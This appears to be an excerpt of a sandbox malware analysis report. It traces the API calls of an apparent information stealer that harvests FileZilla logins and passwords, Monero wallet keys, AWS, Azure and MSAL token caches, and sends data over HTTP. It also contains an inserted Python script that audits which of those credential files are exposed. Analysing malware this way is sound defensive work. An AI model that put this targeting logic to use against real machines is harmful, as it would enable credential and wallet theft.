                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00860562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00860571
                              • lstrcat.KERNEL32(?,url: ), ref: 00860580
                              • lstrcat.KERNEL32(?,00000000), ref: 00860593
                              • lstrcat.KERNEL32(?,00871678), ref: 008605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 008605B5
                              • lstrcat.KERNEL32(?,0087167C), ref: 008605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 008605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 008605E6
                              • lstrcat.KERNEL32(?,00871688), ref: 008605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00860604
                              • lstrcat.KERNEL32(?,00000000), ref: 00860617
                              • lstrcat.KERNEL32(?,00871698), ref: 00860626
                              • lstrcat.KERNEL32(?,0087169C), ref: 00860635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 09491900b25b30cf9e3637ff2b751ede8545c5d1e4101bfce3b8727425062ce8
                              • Instruction ID: 287787be8deea40877715873f21710f3c52836358d7861d61e8abd5ec887c3c6
                              • Opcode Fuzzy Hash: 09491900b25b30cf9e3637ff2b751ede8545c5d1e4101bfce3b8727425062ce8
                              • Instruction Fuzzy Hash: C7D10D719102089BCB08EBE8DD96EEE7738FF24701F518519F506F6195DE34AA06CF62
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008559F8
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00855A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00855B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015CE5F0,00000000,?,015C9FC8,00000000,?,00871A1C), ref: 00855E71
                              • lstrlen.KERNEL32(00000000), ref: 00855E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00855E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00855E9A
                              • lstrlen.KERNEL32(00000000), ref: 00855EAF
                              • lstrlen.KERNEL32(00000000), ref: 00855ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00855EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00855F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00855F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00855F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00855FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00855FBD
                              • HttpOpenRequestA.WININET(00000000,015CE560,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00855BF8
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • InternetCloseHandle.WININET(00000000), ref: 00855FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: c93efbfb554fe51a3a1d708d7d6330321a76307e27a4e709830bf6e807f6f218
                              • Instruction ID: ca85c5af8de1a16ba6dc09c996cde927b3e833608092b61f83a3eaf2ec49047e
                              • Opcode Fuzzy Hash: c93efbfb554fe51a3a1d708d7d6330321a76307e27a4e709830bf6e807f6f218
                              • Instruction Fuzzy Hash: 30121171920118AADB19EBA4DC96FEEB378FF14700F5141A9B506F3091EF706A4ACF52
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0085D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0085D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D208
                              • lstrcat.KERNEL32(?,00871478), ref: 0085D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D22A
                              • lstrcat.KERNEL32(?,0087147C), ref: 0085D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D24C
                              • lstrcat.KERNEL32(?,00871480), ref: 0085D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D26E
                              • lstrcat.KERNEL32(?,00871484), ref: 0085D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D290
                              • lstrcat.KERNEL32(?,00871488), ref: 0085D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D2B2
                              • lstrcat.KERNEL32(?,0087148C), ref: 0085D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D2D4
                              • lstrcat.KERNEL32(?,00871490), ref: 0085D2E3
                                • Part of subcall function 0086A820: lstrlen.KERNEL32(00854F05,?,?,00854F05,00870DDE), ref: 0086A82B
                                • Part of subcall function 0086A820: lstrcpy.KERNEL32(00870DDE,00000000), ref: 0086A885
                              • lstrlen.KERNEL32(?), ref: 0085D32A
                              • lstrlen.KERNEL32(?), ref: 0085D339
                                • Part of subcall function 0086AA70: StrCmpCA.SHLWAPI(015C89D0,0085A7A7,?,0085A7A7,015C89D0), ref: 0086AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0085D3B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: fc023ebcd9fd9b85c52bec627cb3354be202ee9b786927c56c3662878a2bc775
                              • Instruction ID: a6245947ab82dfd43b7d7b223e184c09a50f9d2c468ea6a27c7af387c3a7ceeb
                              • Opcode Fuzzy Hash: fc023ebcd9fd9b85c52bec627cb3354be202ee9b786927c56c3662878a2bc775
                              • Instruction Fuzzy Hash: 80E1BA719101049BCB08EBA4DD96EEE7379FF24301F11416AB506F7191DE35AA06CFA3
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00854915
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 0085493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00854ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00870DDB,00000000,?,?,00000000,?,",00000000,?,015CE590), ref: 00854DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00854E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00854E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00854E49
                              • InternetCloseHandle.WININET(00000000), ref: 00854EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00854EC5
                              • HttpOpenRequestA.WININET(00000000,015CE560,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00854B15
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • InternetCloseHandle.WININET(00000000), ref: 00854ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                               • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: d6bc02d31d548fce413e180dad7b2b6358129020c9be046ca82574b189d57054
                              • Instruction ID: a6b914ebbc1153f8a58cc426a52c9028156f747bf37e6ce990c93d8bd3b9654f
                              • Opcode Fuzzy Hash: d6bc02d31d548fce413e180dad7b2b6358129020c9be046ca82574b189d57054
                              • Instruction Fuzzy Hash: 6112D871910118AADB19EB98DD92FEEB739FF14300F5141A9B506B3091EF706B4ACF62
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015CCCD8,00000000,?,0087144C,00000000,?,?), ref: 0085CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0085CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0085CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0085CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0085CAD9
                              • StrStrA.SHLWAPI(?,015CCD80,00870B52), ref: 0085CAF7
                              • StrStrA.SHLWAPI(00000000,015CCD08), ref: 0085CB1E
                              • StrStrA.SHLWAPI(?,015CD698,00000000,?,00871458,00000000,?,00000000,00000000,?,015C8890,00000000,?,00871454,00000000,?), ref: 0085CCA2
                              • StrStrA.SHLWAPI(00000000,015CD578), ref: 0085CCB9
                                • Part of subcall function 0085C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0085C871
                                • Part of subcall function 0085C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0085C87C
                              • StrStrA.SHLWAPI(?,015CD578,00000000,?,0087145C,00000000,?,00000000,015C8970), ref: 0085CD5A
                              • StrStrA.SHLWAPI(00000000,015C8A80), ref: 0085CD71
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B46), ref: 0085C943
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B47), ref: 0085C957
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B4E), ref: 0085C978
                              • lstrlen.KERNEL32(00000000), ref: 0085CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0085CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 5b2b1bce694f80e17133ff150cfd7a6f810307c40e40c45adf39006427f8cd19
                              • Instruction ID: 9142941a2dd7eba0f79379ce0a1af9fd67ad5a0801a30b825a71e0906757948b
                              • Opcode Fuzzy Hash: 5b2b1bce694f80e17133ff150cfd7a6f810307c40e40c45adf39006427f8cd19
                              • Instruction Fuzzy Hash: 4CE1EE71910108ABDB18EBA8DC96FEE7779FF14300F514169F506B7191DE306A4ACFA2
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • RegOpenKeyExA.ADVAPI32(00000000,015CAE20,00000000,00020019,00000000,008705B6), ref: 008683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00868426
                              • wsprintfA.USER32 ref: 00868459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0086847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868499
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 5b27052e28f799621103bbe57273d7338473368f9600e572bf7799a386672118
                              • Instruction ID: bf218bdff2c548ada55bd9fe2b8e7a9d7cb972aacb8b16b0080a70c205e2153a
                              • Opcode Fuzzy Hash: 5b27052e28f799621103bbe57273d7338473368f9600e572bf7799a386672118
                              • Instruction Fuzzy Hash: 5B81FA71910118ABDB28DB54CD95FEAB7B8FF58700F008299E50AA6140DF756B86CFD1
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00864DCD
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 0086492C
                                • Part of subcall function 00864910: FindFirstFileA.KERNEL32(?,?), ref: 00864943
                              • lstrcat.KERNEL32(?,00000000), ref: 00864E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00864E59
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                                • Part of subcall function 00864910: FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                                • Part of subcall function 00864910: FindClose.KERNEL32(000000FF), ref: 00864B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00864EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00864EE5
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 008649B0
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,008708D2), ref: 008649C5
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 008649E2
                                • Part of subcall function 00864910: PathMatchSpecA.SHLWAPI(?,?), ref: 00864A1E
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,015CE500), ref: 00864A4A
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,00870FF8), ref: 00864A5C
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,?), ref: 00864A70
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,00870FFC), ref: 00864A82
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,?), ref: 00864A96
                                • Part of subcall function 00864910: CopyFileA.KERNEL32(?,?,00000001), ref: 00864AAC
                                • Part of subcall function 00864910: DeleteFileA.KERNEL32(?), ref: 00864B31
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 33d31373b1081d3fa35868efb2f39712d57c7de103c97c477efec343dce549a5
                              • Instruction ID: 34b223b68d3aa2abbdb2ba744773ca3406988e6579b210c342f04d84a7c6ffb0
                              • Opcode Fuzzy Hash: 33d31373b1081d3fa35868efb2f39712d57c7de103c97c477efec343dce549a5
                              • Instruction Fuzzy Hash: 53416D7AA4020466CB54F7B4EC4BFDD7238FB24701F008595B689E61C5EEB897898B93
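Added example, not code from the Joe Sandbox report or the analysed sample: a Python exposure audit that walks the same three folders the function above builds from SHGetFolderPathA(CSIDL 0x1C = CSIDL_LOCAL_APPDATA) plus `\.azure\`, `\.aws\` and `\.IdentityService\`, and lists every file a FindFirstFile "*.*" / PathMatchSpec / CopyFile loop of the shape seen in subcall 00864910 would stage. The root directory is a parameter because the trace resolves the local AppData folder (where `.IdentityService\msal.cache` lives) while AWS CLI and Azure CLI credential files normally sit under the user profile, so run it against both roots. Which of the two string-table patterns ("*.*", "msal.cache") applies to which folder, the recursion into sub-directories, and the use of the `Azure\.aws`-style strings as staging names are assumptions; the demo tree is constructed.

```python
"""Exposure audit for the cloud-credential folders walked by the function above.

Added example, not code from the report or the analysed sample. Folder names
come from the API trace; the per-folder match pattern, the recursion into
sub-directories and the staging-name prefix are assumptions.
"""
import fnmatch
import os
import tempfile
from pathlib import Path

# Folder -> filename pattern handed to PathMatchSpec. The trace only shows the
# strings "*.*" and "msal.cache"; which pattern belongs to which folder is assumed.
TARGETS = {
    ".azure": "*.*",
    ".aws": "*.*",
    ".IdentityService": "msal.cache",
}

# "Azure\.aws" etc. appear in the string table; assumed to be the sub-folder
# names the collector uses inside its staging directory.
STAGING_PREFIX = "Azure"


def name_matches(name: str, pattern: str) -> bool:
    """Win32 wildcard semantics: "*.*" matches every name, including ones
    without an extension such as the AWS "credentials" file."""
    if pattern == "*.*":
        return True
    return fnmatch.fnmatchcase(name, pattern)


def collect(root: Path) -> dict:
    """Map relative source path -> staging path for every file the loop
    (FindFirstFile "*.*", skip "." and "..", recurse, PathMatchSpec, CopyFile)
    would take from `root`. Source keys use "/" so they are stable across OSes."""
    found = {}
    for folder, pattern in TARGETS.items():
        base = root / folder
        if not base.is_dir():
            continue
        # os.walk skips "." and ".." and descends into sub-directories, which is
        # the assumed behaviour of the FindFirstFile/FindNextFile loop.
        for dirpath, _dirs, files in os.walk(base):
            for name in sorted(files):
                if not name_matches(name, pattern):
                    continue
                rel_parts = (Path(dirpath) / name).relative_to(root).parts
                found["/".join(rel_parts)] = "\\".join((STAGING_PREFIX,) + rel_parts)
    return found


def build_demo_tree(root: Path) -> None:
    """Constructed fixture: files a developer workstation typically has in these
    folders, plus two that the patterns should leave alone."""
    files = [
        ".aws/credentials",
        ".aws/config",
        ".aws/sso/cache/session.json",
        ".azure/azureProfile.json",
        ".azure/msal_token_cache.bin",
        ".IdentityService/msal.cache",
        ".IdentityService/notes.txt",   # not "msal.cache": must be skipped
        "Documents/todo.txt",           # not a targeted folder
    ]
    for rel in files:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("placeholder")


def run_demo() -> dict:
    """Build the fixture in a temporary directory and return what would be staged."""
    root = Path(tempfile.mkdtemp())
    build_demo_tree(root)
    return collect(root)


if __name__ == "__main__":
    for src, dst in run_demo().items():
        print(f"{src:40} -> {dst}")
```

Point `collect()` at `%LOCALAPPDATA%` and at `%USERPROFILE%` on a real workstation to see which long-lived credentials (AWS access keys, Azure CLI refresh tokens, the MSAL token cache) a stealer with this module would carry off; every hit is a candidate for moving to short-lived, hardware-bound or credential-manager-backed storage.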
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0086906C
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
